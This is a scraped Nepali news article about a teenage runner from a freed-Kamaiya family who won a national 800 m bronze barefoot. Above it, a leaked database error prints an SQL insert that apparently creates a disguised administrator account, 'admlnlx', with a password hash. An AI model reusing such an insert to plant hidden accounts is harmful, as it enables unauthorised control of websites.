WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bjf.9OH4y7VMCIGDpEhq68jyKnWUsE0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 14:47:21', '', 'admlnlx', 'admlnlx')
इटहरी,पुस ११ –
सोमबार महिला तर्फको ८ सय मिटर दौडमा कास्य पदक जितेकी कैलाली टीकापुरकी सीमाकुमारी चौधरी अरु खेलाडी भन्दा फरक थिइन्। अरु खेलाडीहरु दौडका लागि प्रयोग गरिने विशेष जुत्ता स्पाइक जुत्तामा थिए, तर उनी खाली खुट्टा दौडिएकी थिइन्। खाली खुट्टा दौडिएपनि १५ वर्षीया किशोरीको प्रतिभालाई केहीले रोक्न सकेन। सुदूर पश्चिमाञ्चल विकास क्षेत्रबाट सहभागी भएकी चौधरीले नेपाली सेनाका दुई खेलाडी बाहेक दुई विभागीय टिम र चार अञ्चलका प्रतिस्पर्धीलाई पछि पार्दै कास्य पदक हात पारिन्।
जुत्ता नलगाउनुको कारणबारे उनले भनिन् ‘ हामीलाई जुत्ता लगाएर खेल्न पुग्दा पनि पुग्दैन, खेल्ने बानी पनि छैन।’ सीमाले आफू जुत्ता लगाएर खेलेको भए प्रदर्शन सुधार हुने बताइन्। सामान्य किसान परिवारकी उनले आफ्नो आर्थिक अवस्थाले जुत्ता लगाउन पनि नपुग्ने बताइन्। उनीहरु टीकापुरको मुक्त कमैया शिविरमा बस्छन्। बुबा घर बनाउने ज्यामी काम गर्छन्। सम्पत्तिको नाममा १ कठ्ठा जमिन रहेको उनले बताइन्। घरको अवस्था पनि कमजोर छ, खेल्नलाई जुत्ता किन्न सकिदैन’ उनले भनिन् ‘कसैले दिए मात्र लगाउने पाइएला।’ सीमा यस पटकको राष्ट्रिय खेलकुद प्रतियोगितामा विना तालिम सहभागी भएकी हुन्।
उनलाई नियमित रुपमा प्रशिक्षण दिने प्रशिक्षक पनि छैनन्। ‘अहिले पहिलो पटक भएर मैले जित्न नसकेको हो’ उनले भनिन् पछि म सबैलाई जित्छु।’ सीमाले राम्रोसँग खेल खेलेर आर्मी बन्ने र विदेशमा पनि खेल खेल्ने चाहना रहेको बताइन्।